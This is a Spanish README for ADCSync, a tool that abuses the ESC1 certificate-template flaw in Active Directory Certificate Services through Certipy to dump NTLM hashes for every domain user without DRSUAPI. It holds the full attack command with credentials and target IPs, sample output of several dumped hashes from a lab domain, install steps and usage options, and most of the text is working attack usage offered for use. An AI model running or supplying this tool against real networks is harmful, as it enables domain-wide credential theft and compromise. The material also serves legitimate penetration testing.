
Usa ESC1 para realizar un DCSync improvisado y volcar hashes
Esta es una herramienta que preparé rápidamente para realizar un DCSync utilizando ESC1. Es bastante lenta, pero por lo demás es un medio efectivo para realizar un ataque DCSync improvisado sin utilizar DRSUAPI ni Volume Shadow Copy.
Esta es la primera versión de la herramienta y básicamente solo automatiza el proceso de ejecutar Certipy contra cada usuario de un dominio. Aún necesita mucho trabajo y planeo añadir más funcionalidades en el futuro para métodos de autenticación y automatizar el proceso de encontrar una plantilla vulnerable.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Obteniendo certificados de usuario:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync utiliza el exploit ESC1 para volcar hashes NTLM de cuentas de usuario en un entorno de Active Directory. La herramienta primero obtiene todos los usuarios y dominios del archivo de volcado de Bloodhound que se pasa. Luego usa Certipy para hacer una solicitud por cada usuario y almacena su archivo PFX en el directorio de certificados. Finalmente, usa Certipy para autenticarse con el certificado y recuperar el hash NT de cada usuario. Este proceso es bastante lento y puede tardar un rato en completarse, pero ofrece una alternativa para volcar hashes NTLM.
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
Para usar esta herramienta necesitamos lo siguiente:
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Uso: adcsync.py [OPCIONES]
Opciones:
-f, --file TEXT Archivo JSON de lista de usuarios desde Bloodhound [requerido]
-o, --output TEXT Archivo de salida de hashes NTLM [requerido]
-ca TEXT Autoridad de certificación [requerido]
-dc-ip TEXT Dirección IP del controlador de dominio [requerido]
-u, --user TEXT Nombre de usuario [requerido]
-p, --password TEXT Contraseña [requerido]
-template TEXT Nombre de la plantilla vulnerable a ESC1 [requerido]
-target-ip TEXT Dirección IP de la máquina objetivo [requerido]
--help Muestra este mensaje y sale.